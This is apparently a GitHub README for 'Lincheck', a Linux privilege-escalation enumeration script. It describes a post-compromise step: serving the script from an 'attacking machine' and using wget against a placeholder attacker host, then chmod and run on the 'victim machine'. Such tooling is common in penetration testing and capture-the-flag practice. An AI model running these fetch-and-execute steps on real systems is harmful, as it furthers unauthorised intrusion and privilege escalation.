Skip to content

Latest commit

 

History

History
26 lines (13 loc) · 842 Bytes

README.md

File metadata and controls

26 lines (13 loc) · 842 Bytes

Lincheck

This is a linux privilege escalation checker tool that checks for common linux privilege escilation techniques.

Once you have get a initial foothold on a target machine than you can transfer this linux script on to the victim machine with python http server.

In Your Attacking Machine

git clone https://github.com/Vivek170952/Lincheck.git

cd Lincheck

python -m http.server 4444

In Your Victim Machine

wget http://YOUR-IP:4444/linprivcheck.sh

chmod +x linprivcheck.sh

./linprivcheck.sh

This tool will save your lots of time inenumeration of machine and gives result in a good format.

21.04.2023_10.03.08_REC.mp4